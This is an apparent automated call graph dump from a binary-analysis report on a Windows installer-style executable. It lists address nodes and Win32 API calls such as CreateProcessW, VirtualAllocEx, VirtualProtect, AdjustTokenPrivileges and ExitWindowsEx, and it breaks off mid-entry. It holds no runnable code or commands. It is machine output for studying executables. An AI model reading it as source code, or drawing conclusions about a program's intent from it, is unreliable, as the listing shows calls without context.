4039a9 DeleteFileW 4347->4349 4351 403634 12 API calls 4348->4351 4422 4030f5 GetTickCount GetModuleFileNameW 4349->4422 4350->4344 4353 40396f 4351->4353 4353->4349 4355 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4353->4355 4354 4039bd 4357 403a74 4354->4357 4360 403a64 4354->4360 4364 405f9e CharNextW 4354->4364 4358 403634 12 API calls 4355->4358 4509 4066a2 lstrcpynW 4356->4509 4586 403c82 4357->4586 4362 4039a1 4358->4362 4452 403d74 4360->4452 4362->4349 4362->4357 4377 4039dc 4364->4377 4366 403bc2 4595 405d02 4366->4595 4367 403be6 4368 403c6a ExitProcess 4367->4368 4369 403bee GetCurrentProcess OpenProcessToken 4367->4369 4371 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 4369->4371 4372 403c3a 4369->4372 4371->4372 4379 406a96 5 API calls 4372->4379 4373 403a3a 4510 406079 4373->4510 4374 403a7d 4526 405c6d 4374->4526 4377->4373 4377->4374 4382 403c41 4379->4382 4385 403c56 ExitWindowsEx 4382->4385 4387 403c63 4382->4387 4385->4368 4385->4387 4386 403a9c 4389 403ab4 4386->4389 4530 4066a2 lstrcpynW 4386->4530 4599 40140b 4387->4599 4394 403ada wsprintfW 4389->4394 4407 403b06 4389->4407 4391 403a59 4525 4066a2 lstrcpynW 4391->4525 4395 4066df 21 API calls 4394->4395 4395->4389 4398 403b50 SetCurrentDirectoryW 4576 406462 MoveFileExW 4398->4576 4399 403b16 GetFileAttributesW 4400 403b22 DeleteFileW 4399->4400 4399->4407 4400->4407 4404 406462 40 API calls 4404->4407 4405 4066df 21 API calls 4405->4407 4407->4357 4407->4389 4407->4394 4407->4398 4407->4399 4407->4404 4407->4405 4408 403bd8 CloseHandle 4407->4408 4531 405bf6 CreateDirectoryW 4407->4531 4534 405c50 CreateDirectoryW 4407->4534 4537 405dae 4407->4537 4580 405c85 CreateProcessW 4407->4580 4583 4069ff FindFirstFileW 4407->4583 4408->4357 4410->4338 4411->4340 4413 406950 5 API calls 4412->4413 4415 403640 4413->4415 4414 40364a 4414->4347 4415->4414 4602 405f71 lstrlenW CharPrevW 4415->4602 4418 405c50 2 API calls 4419 403658 4418->4419 4420 4061c1 2 API calls 4419->4420 4421 403663 4420->4421 4421->4347 4605 406192 GetFileAttributesW CreateFileW 4422->4605 4424 403138 4451 403145 4424->4451 4606 4066a2 lstrcpynW 4424->4606 4426 40315b 4607 405fbd lstrlenW 4426->4607 4430 40316c GetFileSize 4431 403266 4430->4431 4450 403183 4430->4450 4612 403053 4431->4612 4435 4032ab GlobalAlloc 4437 4032c2 4435->4437 4436 403303 4439 403053 36 API calls 4436->4439 4441 4061c1 2 API calls 4437->4441 4439->4451 4440 40328c 4442 403607 ReadFile 4440->4442 4445 4032d3 CreateFileW 4441->4445 4444 403297 4442->4444 4443 403053 36 API calls 4443->4450 4444->4435 4444->4451 4446 40330d 4445->4446 4445->4451 4627 40361d SetFilePointer 4446->4627 4448 40331b 4628 403396 4448->4628 4450->4431 4450->4436 4450->4443 4450->4451 4643 403607 4450->4643 4451->4354 4453 406a96 5 API calls 4452->4453 4454 403d88 4453->4454 4455 403da0 4454->4455 4456 403d8e 4454->4456 4457 406570 3 API calls 4455->4457 4698 4065e9 wsprintfW 4456->4698 4458 403dd0 4457->4458 4460 403def lstrcatW 4458->4460 4462 406570 3 API calls 4458->4462 4461 403d9e 4460->4461 4690 40404a 4461->4690 4462->4460 4465 406079 18 API calls 4466 403e21 4465->4466 4467 403eb5 4466->4467 4469 406570 3 API calls 4466->4469 4468 406079 18 API calls 4467->4468 4470 403ebb 4468->4470 4471 403e53 4469->4471 4472 403ecb LoadImageW 4470->4472 4473 4066df 21 API calls 4470->4473 4471->4467 4476 403e74 lstrlenW 4471->4476 4479 405f9e CharNextW 4471->4479 4474 403f71 4472->4474 4475 403ef2 RegisterClassW 4472->4475 4473->4472 4478 40140b 2 API calls 4474->4478 4477 403f28 SystemParametersInfoW CreateWindowExW 4475->4477 4507 403f7b 4475->4507 4480 403e82 lstrcmpiW 4476->4480 4481 403ea8 4476->4481 4477->4474 4482 403f77 4478->4482 4483 403e71 4479->4483 4480->4481 4484 403e92 GetFileAttributesW 4480->4484 4485 405f71 3 API calls 4481->4485 4488 40404a 22 API calls 4482->4488 4482->4507 4483->4476 4487 403e9e 4484->4487 4486 403eae 4485->4486 4699 4066a2 lstrcpynW 4486->4699 4487->4481 4491 405fbd 2 API calls 4487->4491 4489 403f88 4488->4489 4492 403f94 ShowWindow 4489->4492 4493 404017 4489->4493 4491->4481 4494 406a26 3 API calls 4492->4494 4700 4057fa OleInitialize 4493->4700 4496 403fac 4494->4496 4500 403fba GetClassInfoW 4496->4500 4502 406a26 3 API calls 4496->4502 4497 40401d 4498 404021 4497->4498 4499 404039 4497->4499 4505 40140b 2 API calls 4498->4505 4498->4507 4501 40140b 2 API calls 4499->4501 4503 403fe4 DialogBoxParamW 4500->4503 4504 403fce GetClassInfoW RegisterClassW 4500->4504 4501->4507 4502->4500 4506 40140b 2 API calls 4503->4506 4504->4503 4505->4507 4508 40400c 4506->4508 4507->4357 4508->4507 4509->4345 4718 4066a2 lstrcpynW 4510->4718 4512 40608a 4719 40601c CharNextW CharNextW 4512->4719 4515 403a46 4515->4357 4524 4066a2 lstrcpynW 4515->4524 4516 406950 5 API calls 4522 4060a0 4516->4522 4517 4060d1 lstrlenW 4518 4060dc 4517->4518 4517->4522 4520 405f71 3 API calls 4518->4520 4519 4069ff 2 API calls 4519->4522 4521 4060e1 GetFileAttributesW 4520->4521 4521->4515 4522->4515 4522->4517 4522->4519 4523 405fbd 2 API calls 4522->4523 4523->4517 4524->4391 4525->4360 4527 406a96 5 API calls 4526->4527 4528 403a82 lstrlenW 4527->4528 4529 4066a2 lstrcpynW 4528->4529 4529->4386 4530->4389 4532 405c42 4531->4532 4533 405c46 GetLastError 4531->4533 4532->4407 4533->4532 4535 405c60 4534->4535 4536 405c64 GetLastError 4534->4536 4535->4407 4536->4535 4538 406079 18 API calls 4537->4538 4539 405dce 4538->4539 4540 405dd6 DeleteFileW 4539->4540 4541 405ded 4539->4541 4542 405f24 4540->4542 4543 405f18 4541->4543 4725 4066a2 lstrcpynW 4541->4725 4542->4407 4543->4542 4550 4069ff 2 API calls 4543->4550 4545 405e13 4546 405e26 4545->4546 4547 405e19 lstrcatW 4545->4547 4549 405fbd 2 API calls 4546->4549 4548 405e2c 4547->4548 4551 405e3c lstrcatW 4548->4551 4554 405e47 lstrlenW FindFirstFileW 4548->4554 4549->4548 4552 405f32 4550->4552 4551->4554 4552->4542 4553 405f36 4552->4553 4555 405f71 3 API calls 4553->4555 4556 405f0d 4554->4556 4574 405e69 4554->4574 4557 405f3c 4555->4557 4556->4543 4559 405d66 5 API calls 4557->4559 4558 405ef0 FindNextFileW 4562 405f06 FindClose 4558->4562 4558->4574 4561 405f48 4559->4561 4563 405f62 4561->4563 4564 405f4c 4561->4564 4562->4556 4566 405727 28 API calls 4563->4566 4564->4542 4567 405727 28 API calls 4564->4567 4566->4542 4569 405f59 4567->4569 4568 405dae 64 API calls 4568->4574 4571 406462 40 API calls 4569->4571 4570 405727 28 API calls 4570->4558 4572 405f60 4571->4572 4572->4542 4573 405727 28 API calls 4573->4574 4574->4558 4574->4568 4574->4570 4574->4573 4575 406462 40 API calls 4574->4575 4726 4066a2 lstrcpynW 4574->4726 4727 405d66 4574->4727 4575->4574 4577 403b5f CopyFileW 4576->4577 4578 406476 4576->4578 4577->4357 4577->4407 4738 4062e8 4578->4738 4581 405cc4 4580->4581 4582 405cb8 CloseHandle 4580->4582 4581->4407 4582->4581 4584 406a15 FindClose 4583->4584 4585 406a20 4583->4585 4584->4585 4585->4407 4587 403c93 CloseHandle 4586->4587 4588 403c9d 4586->4588 4587->4588 4589 403cb1 4588->4589 4590 403ca7 CloseHandle 4588->4590 4772 403cdf 4589->4772 4590->4589 4593 405dae 71 API calls 4594 403bb5 OleUninitialize 4593->4594 4594->4366 4594->4367 4596 405d17 4595->4596 4597 403bd0 ExitProcess 4596->4597 4598 405d2b MessageBoxIndirectW 4596->4598 4598->4597 4600 401389 2 API calls 4599->4600 4601 401420 4600->4601 4601->4368 4603 403652 4602->4603 4604 405f8d lstrcatW 4602->4604 4603->4418 4604->4603 4605->4424 4606->4426 4608 405fcb 4607->4608 4609 405fd1 CharPrevW 4608->4609 4610 403161 4608->4610 4609->4608 4609->4610 4611 4066a2 lstrcpynW 4610->4611 4611->4430 4613 403064 4612->4613 4614 40307c 4612->4614 4617 40306d DestroyWindow 4613->4617 4618 403074 4613->4618 4615 403084 4614->4615 4616 40308c GetTickCount 4614->4616 4647 406ad2 4615->4647 4616->4618 4620 40309a 4616->4620 4617->4618 4618->4435 4618->4451 4646 40361d SetFilePointer 4618->4646 4621 4030a2 4620->4621 4622 4030cf CreateDialogParamW ShowWindow 4620->4622 4621->4618 4651 403037 4621->4651 4622->4618 4624 4030b0 wsprintfW 4654 405727 4624->4654 4627->4448 4629 4033c1 4628->4629 4630 4033a5 SetFilePointer 4628->4630 4665 40349e GetTickCount 4629->4665 4630->4629 4633 40345e 4633->4451 4636 40349e 46 API calls 4637 4033f8 4636->4637 4637->4633 4638 403464 ReadFile 4637->4638 4640 403407 4637->4640 4638->4633 4640->4633 4641 406215 ReadFile 4640->4641 4680 406244 WriteFile 4640->4680 4641->4640 4644 406215 ReadFile 4643->4644 4645 40361a 4644->4645 4645->4450 4646->4440 4648 406aef PeekMessageW 4647->4648 4649 406ae5 DispatchMessageW 4648->4649 4650 406aff 4648->4650 4649->4648 4650->4618 4652 403046 4651->4652 4653 403048 MulDiv 4651->4653 4652->4653 4653->4624 4655 405742 4654->4655 4656 4030cd 4654->4656 4657 40575e lstrlenW 4655->4657 4658 4066df 21 API calls 4655->4658 4656->4618 4659 405787 4657->4659 4660 40576c lstrlenW 4657->4660 4658->4657 4662 40579a 4659->4662 4663 40578d SetWindowTextW 4659->4663 4660->4656 4661 40577e lstrcatW 4660->4661 4661->4659 4662->4656 4664 4057a0 SendMessageW SendMessageW SendMessageW 4662->4664 4663->4662 4664->4656 4666 4035f6 4665->4666 4667 4034cc 4665->4667 4668 403053 36 API calls 4666->4668 4682 40361d SetFilePointer 4667->4682 4674 4033c8 4668->4674 4670 4034d7 SetFilePointer 4676 4034fc 4670->4676 4671 403607 ReadFile 4671->4676 4673 403053 36 API calls 4673->4676 4674->4633 4678 406215 ReadFile 4674->4678 4675 406244 WriteFile 4675->4676 4676->4671 4676->4673 4676->4674 4676->4675 4677 4035d7 SetFilePointer 4676->4677 4683 406c11 4676->4683 4677->4666 4679 4033e1 4678->4679 4679->4633 4679->4636 4681 406262 4680->4681 4681->4640 4682->4670 4684 406c36 4683->4684 4685 406c3e 4683->4685 4684->4676 4685->4684 4686 406cc5 GlobalFree 4685->4686 4687 406cce GlobalAlloc 4685->4687 4688 406d45 GlobalAlloc 4685->4688 4689 406d3c GlobalFree 4685->4689 4686->4687 4687->4684 4687->4685 4688->4684 4688->4685 4689->4688 4691 40405e 4690->4691 4707 4065e9 wsprintfW 4691->4707 4693 4040cf 4708 404103 4693->4708 4695 403dff 4695->4465 4696 4040d4 4696->4695 4697 4066df 21 API calls 4696->4697 4697->4696 4698->4461 4699->4467 4711 40466d 4700->4711 4702 40581d 4706 405844 4702->4706 4714 401389 4702->4714 4703 40466d SendMessageW 4704 405856 OleUninitialize 4703->4704 4704->4497 4706->4703 4707->4693 4709 4066df 21 API calls 4708->4709 4710 404111 SetWindowTextW 4709->4710 4710->4696 4712 404685 4711->4712 4713 404676 SendMessageW 4711->4713 4712->4702 4713->4712 4716 401390 4714->4716 4715 4013fe 4715->4702 4716->4715 4717 4013cb MulDiv SendMessageW 4716->4717 4717->4716 4718->4512 4720 406039 4719->4720 4724 40604b 4719->4724 4721 406046 CharNextW 4720->4721 4720->4724 4722 40606f 4721->4722 4722->4515 4722->4516 4723 405f9e CharNextW 4723->4724 4724->4722 4724->4723 4725->4545 4726->4574 4735 40616d GetFileAttributesW 4727->4735 4730 405d93 4730->4574 4731 405d81 RemoveDirectoryW 4733 405d8f 4731->4733 4732 405d89 DeleteFileW 4732->4733 4733->4730 4734 405d9f SetFileAttributesW 4733->4734 4734->4730 4736 405d72 4735->4736 4737 40617f SetFileAttributesW 4735->4737 4736->4730 4736->4731 4736->4732 4737->4736 4739 406318 4738->4739 4740 40633e GetShortPathNameW 4738->4740 4765 406192 GetFileAttributesW CreateFileW 4739->4765 4742 406353 4740->4742 4743 40645d 4740->4743 4742->4743 4745 40635b wsprintfA 4742->4745 4743->4577 4744 406322 CloseHandle GetShortPathNameW 4744->4743 4746 406336 4744->4746 4747 4066df 21 API calls 4745->4747 4746->4740 4746->4743 4748 406383 4747->4748 4766 406192 GetFileAttributesW CreateFileW 4748->4766 4750 406390 4750->4743 4751 40639f GetFileSize GlobalAlloc 4750->4751 4752 4063c1 4751->4752 4753 406456 CloseHandle 4751->4753 4754 406215 ReadFile 4752->4754 4753->4743 4755 4063c9 4754->4755 4755->4753 4767 4060f7 lstrlenA 4755->4767 4758 4063e0 lstrcpyA 4760 406402 4758->4760 4759 4063f4 4761 4060f7 4 API calls 4759->4761 4762 406439 SetFilePointer 4760->4762 4761->4760 4763 406244 WriteFile 4762->4763 4764 40644f GlobalFree 4763->4764 4764->4753 4765->4744 4766->4750 4768 406138 lstrlenA 4767->4768 4769 406140 4768->4769 4770 406111 lstrcmpiA 4768->4770 4769->4758 4769->4759 4770->4769 4771 40612f CharNextA 4770->4771 4771->4768 4773 403ced 4772->4773 4774 403cb6 4773->4774 4775 403cf2 FreeLibrary GlobalFree 4773->4775 4774->4593 4775->4774 4775->4775 4782 4015e6 4783 402dcb 21 API calls 4782->4783 4784 4015ed 4783->4784 4785 40601c 4 API calls 4784->4785 4798 4015f6 4785->4798 4786 401656 4788 401688 4786->4788 4789 40165b 4786->4789 4787 405f9e CharNextW 4787->4798 4791 401423 28 API calls 4788->4791 4801 401423 4789->4801 4799 401680 4791->4799 4794 405c50 2 API calls 4794->4798 4795 405c6d 5 API calls 4795->4798 4796 40166f SetCurrentDirectoryW 4796->4799 4797 40163c GetFileAttributesW 4797->4798 4798->4786 4798->4787 4798->4794 4798->4795 4798->4797 4800 405bf6 2 API calls 4798->4800 4800->4798 4802 405727 28 API calls 4801->4802 4803 401431 4802->4803 4804 4066a2 lstrcpynW 4803->4804 4804->4796 5402 405866 5403 405a10 5402->5403 5404 405887 GetDlgItem GetDlgItem GetDlgItem 5402->5404 5406 405a41 5403->5406 5407 405a19 GetDlgItem CreateThread CloseHandle 5403->5407 5447 404656 SendMessageW 5404->5447 5409 405a6c 5406->5409 5410 405a91 5406->5410 5411 405a58 ShowWindow ShowWindow 5406->5411 5407->5406 5408 4058f7 5413 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 5408->5413 5412 405acc 5409->5412 5415 405a80 5409->5415 5416 405aa6 ShowWindow 5409->5416 5417 404688 8 API calls 5410->5417 5449 404656 SendMessageW 5411->5449 5412->5410 5420 405ada SendMessageW 5412->5420 5418 405950 SendMessageW SendMessageW 5413->5418 5419 40596c 5413->5419 5450 4045fa 5415->5450 5423 405ac6 5416->5423 5424 405ab8 5416->5424 5422 405a9f 5417->5422 5418->5419 5427 405971 SendMessageW 5419->5427 5428 40597f 5419->5428 5420->5422 5429 405af3 CreatePopupMenu 5420->5429 5426 4045fa SendMessageW 5423->5426 5425 405727 28 API calls 5424->5425 5425->5423 5426->5412 5427->5428 5431 404621 22 API calls 5428->5431 5430 4066df 21 API calls 5429->5430 5432 405b03 AppendMenuW 5430->5432 5433 40598f 5431->5433 5434 405b20 GetWindowRect 5432->5434 5435 405b33 TrackPopupMenu 5432->5435 5436 405998 ShowWindow 5433->5436 5437 4059cc GetDlgItem SendMessageW 5433->5437 5434->5435 5435->5422 5439 405b4e 5435->5439 5440 4059bb 5436->5440 5441 4059ae ShowWindow 5436->5441 5437->5422 5438 4059f3 SendMessageW SendMessageW 5437->5438 5438->5422 5442 405b6a SendMessageW 5439->5442 5448 404656 SendMessageW 5440->5448 5441->5440 5442->5442 5443 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5442->5443 5445 405bac SendMessageW 5443->5445 5445->5445 5446 405bd5 GlobalUnlock SetClipboardData CloseClipboard 5445->5446 5446->5422 5447->5408 5448->5437 5449->5409 5451 404601 5450->5451 5452 404607 SendMessageW 5450->5452 5451->5452 5452->5410 4805 73d82a7f 4806 73d82acf 4805->4806 4807 73d82a8f VirtualProtect 4805->4807 4807->4806 5453 404e68 5454 404e94 5453->5454 5455 404e78 5453->5455 5457 404ec7 5454->5457 5458 404e9a SHGetPathFromIDListW 5454->5458 5464 405ce6 GetDlgItemTextW 5455->5464 5460 404eaa 5458->5460 5463 404eb1 SendMessageW 5458->5463 5459 404e85 SendMessageW 5459->5454 5461 40140b 2 API calls 5460->5461 5461->5463 5463->5457 5464->5459 5465 401c68 5466 402da9 21 API calls 5465->5466 5467 401c6f 5466->5467 5468 402da9 21 API calls 5467->5468 5469 401c7c 5468->5469 5470 401c91 5469->5470 5471 402dcb 21 API calls 5469->5471 5472 401ca1 5470->5472 5473 402dcb 21 API calls 5470->5473 5471->5470 5474 401cf8 5472->5474 5475 401cac 5472->5475 5473->5472 5476 402dcb 21 API calls 5474->5476 5477 402da9 21 API calls 5475->5477 5478 401cfd 5476->5478 5479 401cb1 5477->5479 5481 402dcb 21 API calls 5478->5481 5480 402da9 21 API calls 5479->5480 5482 401cbd 5480->5482 5483 401d06 FindWindowExW 5481->5483 5484 401ce8 SendMessageW 5482->5484 5485 401cca SendMessageTimeoutW 5482->5485 5486 401d28 5483->5486 5484->5486 5485->5486 5487 4028e9 5488 4028ef 5487->5488 5489 4028f7 FindClose 5488->5489 5490 402c4f 5488->5490 5489->5490 5491 73d81774 5492 73d817a3 5491->5492 5493 73d81bff 22 API calls 5492->5493 5494 73d817aa 5493->5494 5495 73d817bd 5494->5495 5496 73d817b1 5494->5496 5497 73d817e4 5495->5497 5498 73d817c7 5495->5498 5499 73d81312 2 API calls 5496->5499 5501 73d817ea 5497->5501 5502 73d8180e 5497->5502 5500 73d815dd 3 API calls 5498->5500 5503 73d817bb 5499->5503 5504 73d817cc 5500->5504 5505 73d81654 3 API calls 5501->5505 5506 73d815dd 3 API calls 5502->5506 5507 73d81654 3 API calls 5504->5507 5508 73d817ef 5505->5508 5506->5503 5509 73d817d2 5507->5509 5510 73d81312 2 API calls 5508->5510 5511 73d81312 2 API calls 5509->5511 5512 73d817f5 GlobalFree 5510->5512 5513 73d817d8 GlobalFree 5511->5513 5512->5503 5514 73d81809 GlobalFree 5512->5514 5513->5503 5514->5503 5515 73d823e9 5516 73d82453 5515->5516 5517 73d8247d 5516->5517 5518 73d8245e GlobalAlloc 5516->5518 5518->5516 5519 4016f1 5520 402dcb 21 API calls 5519->5520 5521 4016f7 GetFullPathNameW 5520->5521 5522 401711 5521->5522 5528 401733 5521->5528 5525 4069ff 2 API calls 5522->5525 5522->5528 5523 401748 GetShortPathNameW 5524 402c4f 5523->5524 5526 401723 5525->5526 5526->5528 5529 4066a2 lstrcpynW 5526->5529 5528->5523 5528->5524 5529->5528 5530 401e73 GetDC 5531 402da9 21 API calls 5530->5531 5532 401e85 GetDeviceCaps MulDiv ReleaseDC 5531->5532 5533 402da9 21 API calls 5532->5533 5534 401eb6 5533->5534 5535 4066df 21 API calls 5534->5535 5536 401ef3 CreateFontIndirectW 5535->5536 5537 40265d 5536->5537 5538 402975 5539 402dcb 21 API calls 5538->5539 5540 402981 5539->5540 5541 402997 5540->5541 5543 402dcb 21 API calls 5540->5543 5542 40616d 2 API calls 5541->5542 5544 40299d 5542->5544 5543->5541 5566 406192 GetFileAttributesW CreateFileW 5544->5566 5546 4029aa 5547 402a60 5546->5547 5548 4029c5 GlobalAlloc 5546->5548 5549 402a48 5546->5549 5550 402a67 DeleteFileW 5547->5550 5551 402a7a 5547->5551 5548->5549 5552 4029de 5548->5552 5553 403396 48 API calls 5549->5553 5550->5551 5567 40361d SetFilePointer 5552->5567 5555 402a55 CloseHandle 5553->5555 5555->5547 5556 4029e4 5557 403607 ReadFile 5556->5557 5558 4029ed GlobalAlloc 5557->5558 5559 402a31 5558->5559 5560 4029fd 5558->5560 5561 406244 WriteFile 5559->5561 5562 403396 48 API calls 5560->5562 5563 402a3d GlobalFree 5561->5563 5565 402a0a 5562->5565 5563->5549 5564 402a28 GlobalFree 5564->5559 5565->5564 5566->5546 5567->5556 5568 4014f5 SetForegroundWindow 5569 402c4f 5568->5569 5584 73d810e1 5585 73d81111 5584->5585 5586 73d812b0 GlobalFree 5585->5586 5587 73d811d7 GlobalAlloc 5585->5587 5588 73d81240 GlobalFree 5585->5588 5589 73d8135a 2 API calls 5585->5589 5590 73d812ab 5585->5590 5591 73d81312 2 API calls 5585->5591 5592 73d8129a GlobalFree 5585->5592 5593 73d81381 lstrcpyW 5585->5593 5594 73d8116b GlobalAlloc 5585->5594 5587->5585 5588->5585 5589->5585 5590->5586 5591->5585 5592->5585 5593->5585 5594->5585 5595 40197b 5596 402dcb 21 API calls 5595->5596 5597 401982 lstrlenW 5596->5597 5598 40265d 5597->5598 4955 4020fd 4956 4021c1 4955->4956 4957 40210f 4955->4957 4959 401423 28 API calls 4956->4959 4958 402dcb 21 API calls 4957->4958 4960 402116 4958->4960 4966 40231b 4959->4966 4961 402dcb 21 API calls 4960->4961 4962 40211f 4961->4962 4963 402135 LoadLibraryExW 4962->4963 4964 402127 GetModuleHandleW 4962->4964 4963->4956 4965 402146 4963->4965 4964->4963 4964->4965 4978 406b05 4965->4978 4969 402190 4971 405727 28 API calls 4969->4971 4970 402157 4972 402176 4970->4972 4973 40215f 4970->4973 4974 402167 4971->4974 4983 73d81817 4972->4983 4975 401423 28 API calls 4973->4975 4974->4966 4976 4021b3 FreeLibrary 4974->4976 4975->4974 4976->4966 5025 4066c4 WideCharToMultiByte 4978->5025 4980 406b22 4981 406b29 GetProcAddress 4980->4981 4982 402151 4980->4982 4981->4982 4982->4969 4982->4970 4984 73d8184a 4983->4984 5026 73d81bff 4984->5026 4986 73d81851 4987 73d81976 4986->4987 4988 73d81869 4986->4988 4989 73d81862 4986->4989 4987->4974 5060 73d82480 4988->5060 5076 73d8243e 4989->5076 4994 73d818cd 4998 73d8191e 4994->4998 4999 73d818d3 4994->4999 4995 73d818af 5089 73d82655 4995->5089 4996 73d81898 5012 73d8188e 4996->5012 5086 73d82e23 4996->5086 4997 73d8187f 5001 73d81885 4997->5001 5006 73d81890 4997->5006 5004 73d82655 10 API calls 4998->5004 5108 73d81666 4999->5108 5001->5012 5070 73d82b98 5001->5070 5010 73d8190f 5004->5010 5005 73d818b5 5100 73d81654 5005->5100 5080 73d82810 5006->5080 5016 73d81965 5010->5016 5114 73d82618 5010->5114 5012->4994 5012->4995 5013 73d81896 5013->5012 5014 73d82655 10 API calls 5014->5010 5016->4987 5018 73d8196f GlobalFree 5016->5018 5018->4987 5022 73d81951 5022->5016 5118 73d815dd wsprintfW 5022->5118 5024 73d8194a FreeLibrary 5024->5022 5025->4980 5121 73d812bb GlobalAlloc 5026->5121 5028 73d81c26 5122 73d812bb GlobalAlloc 5028->5122 5030 73d81c31 5031 73d81e6b GlobalFree GlobalFree GlobalFree 5030->5031 5033 73d81d26 GlobalAlloc 5030->5033 5036 73d821ae 5030->5036 5038 73d81ed2 5030->5038 5041 73d81d71 lstrcpyW 5030->5041 5042 73d81d8f GlobalFree 5030->5042 5044 73d81d7b lstrcpyW 5030->5044 5047 73d82126 5030->5047 5051 73d82067 GlobalFree 5030->5051 5053 73d81dcd 5030->5053 5055 73d812cc 2 API calls 5030->5055 5032 73d81e88 5031->5032 5031->5038 5034 73d81e9d 5032->5034 5035 73d8227e 5032->5035 5032->5038 5033->5030 5034->5038 5125 73d812cc 5034->5125 5037 73d822a0 GetModuleHandleW 5035->5037 5035->5038 5036->5038 5057 73d82216 lstrcpyW 5036->5057 5039 73d822b1 LoadLibraryW 5037->5039 5040 73d822c6 5037->5040 5038->4986 5039->5038 5039->5040 5129 73d816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5040->5129 5041->5044 5042->5030 5044->5030 5045 73d82318 5045->5038 5049 73d82325 lstrlenW 5045->5049 5046 73d822d8 5046->5045 5058 73d82302 GetProcAddress 5046->5058 5128 73d812bb GlobalAlloc 5047->5128 5130 73d816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5049->5130 5051->5030 5053->5030 5123 73d8162f GlobalSize GlobalAlloc 5053->5123 5054 73d8233f 5054->5038 5055->5030 5057->5038 5058->5045 5059 73d8212f 5059->4986 5068 73d82498 5060->5068 5061 73d812cc GlobalAlloc lstrcpynW 5061->5068 5063 73d825c1 GlobalFree 5066 73d8186f 5063->5066 5063->5068 5064 73d8256b GlobalAlloc CLSIDFromString 5064->5063 5065 73d82540 GlobalAlloc WideCharToMultiByte 5065->5063 5066->4996 5066->4997 5066->5012 5067 73d8258a 5067->5063 5136 73d827a4 5067->5136 5068->5061 5068->5063 5068->5064 5068->5065 5068->5067 5132 73d8135a 5068->5132 5071 73d82baa 5070->5071 5072 73d82c4f VirtualAllocEx 5071->5072 5075 73d82c6d 5072->5075 5074 73d82d39 5074->5012 5139 73d82b42 5075->5139 5077 73d82453 5076->5077 5078 73d81868 5077->5078 5079 73d8245e GlobalAlloc 5077->5079 5078->4988 5079->5077 5084 73d82840 5080->5084 5081 73d828db GlobalAlloc 5085 73d828fe 5081->5085 5082 73d828ee 5083 73d828f4 GlobalSize 5082->5083 5082->5085 5083->5085 5084->5081 5084->5082 5085->5013 5087 73d82e2e 5086->5087 5088 73d82e6e GlobalFree 5087->5088 5143 73d812bb GlobalAlloc 5089->5143 5091 73d826d8 MultiByteToWideChar 5096 73d8265f 5091->5096 5092 73d826fa StringFromGUID2 5092->5096 5093 73d8270b lstrcpynW 5093->5096 5094 73d8271e wsprintfW 5094->5096 5095 73d82742 GlobalFree 5095->5096 5096->5091 5096->5092 5096->5093 5096->5094 5096->5095 5097 73d82777 GlobalFree 5096->5097 5098 73d81312 2 API calls 5096->5098 5144 73d81381 5096->5144 5097->5005 5098->5096 5148 73d812bb GlobalAlloc 5100->5148 5102 73d81659 5103 73d81666 2 API calls 5102->5103 5104 73d81663 5103->5104 5105 73d81312 5104->5105 5106 73d8131b GlobalAlloc lstrcpynW 5105->5106 5107 73d81355 GlobalFree 5105->5107 5106->5107 5107->5010 5109 73d8169f lstrcpyW 5108->5109 5110 73d81672 wsprintfW 5108->5110 5113 73d816b8 5109->5113 5110->5113 5113->5014 5115 73d81931 5114->5115 5116 73d82626 5114->5116 5115->5022 5115->5024 5116->5115 5117 73d82642 GlobalFree 5116->5117 5117->5116 5119 73d81312 2 API calls 5118->5119 5120 73d815fe 5119->5120 5120->5016 5121->5028 5122->5030 5124 73d8164d 5123->5124 5124->5053 5131 73d812bb GlobalAlloc 5125->5131 5127 73d812db lstrcpynW 5127->5038 5128->5059 5129->5046 5130->5054 5131->5127 5133 73d81361 5132->5133 5134 73d812cc 2 API calls 5133->5134 5135 73d8137f 5134->5135 5135->5068 5137 73d82808 5136->5137 5138 73d827b2 VirtualAlloc 5136->5138 5137->5067 5138->5137 5140 73d82b4d 5139->5140 5141 73d82b5d 5140->5141 5142 73d82b52 GetLastError 5140->5142 5141->5074 5142->5141 5143->5096 5145 73d8138a 5144->5145 5146 73d813ac 5144->5146 5145->5146 5147 73d81390 lstrcpyW 5145->5147 5146->5096 5147->5146 5148->5102 5606 402b7e 5607 402bd0 5606->5607 5608 402b85 5606->5608 5609 406a96 5 API calls 5607->5609 5611 402da9 21 API calls 5608->5611 5613 402bce 5608->5613 5610 402bd7 5609->5610 5612 402dcb 21 API calls 5610->5612 5614 402b93 5611->5614 5615 402be0 5612->5615 5616 402da9 21 API calls 5614->5616 5615->5613 5617 402be4 IIDFromString 5615->5617 5619 402b9f 5616->5619 5617->5613 5618 402bf3 5617->5618 5618->5613 5624 4066a2 lstrcpynW 5618->5624 5623 4065e9 wsprintfW 5619->5623 5621 402c10 CoTaskMemFree 5621->5613 5623->5613 5624->5621 5625 401000 5626 401037 BeginPaint GetClientRect 5625->5626 5627 40100c DefWindowProcW 5625->5627 5629 4010f3 5626->5629 5630 401179 5627->5630 5631 401073 CreateBrushIndirect FillRect DeleteObject 5629->5631 5632 4010fc 5629->5632 5631->5629 5633 401102 CreateFontIndirectW 5632->5633 5634 401167 EndPaint 5632->5634 5633->5634 5635 401112 6 API calls 5633->5635 5634->5630 5635->5634 5636 402a80 5637 402da9 21 API calls 5636->5637 5638 402a86 5637->5638 5639 402ac9 5638->5639 5640 402aad 5638->5640 5645 402953 5638->5645 5642 402ae3 5639->5642 5643 402ad3 5639->5643 5641 402ab2 5640->5641 5647 402ac3 5640->5647 5650 4066a2 lstrcpynW 5641->5650 5644 4066df 21 API calls 5642->5644 5646 402da9 21 API calls 5643->5646 5644->5645 5646->5645 5651 4065e9 wsprintfW 5647->5651 5650->5645 5651->5645 4235 401781 4241 402dcb 4235->4241 4239 40178f 4240 4061c1 2 API calls 4239->4240 4240->4239 4242 402dd7 4241->4242 4251 4066df 4242->4251 4245 401788 4247 4061c1 4245->4247 4248 4061ce GetTickCount GetTempFileNameW 4247->4248 4249 406208 4248->4249 4250 406204 4248->4250 4249->4239 4250->4248 4250->4249 4255 4066ea 4251->4255 4252 406931 4253 402df8 4252->4253 4290 4066a2 lstrcpynW 4252->4290 4253->4245 4268 406950 4253->4268 4255->4252 4256 406902 lstrlenW 4255->4256 4260 4067fb 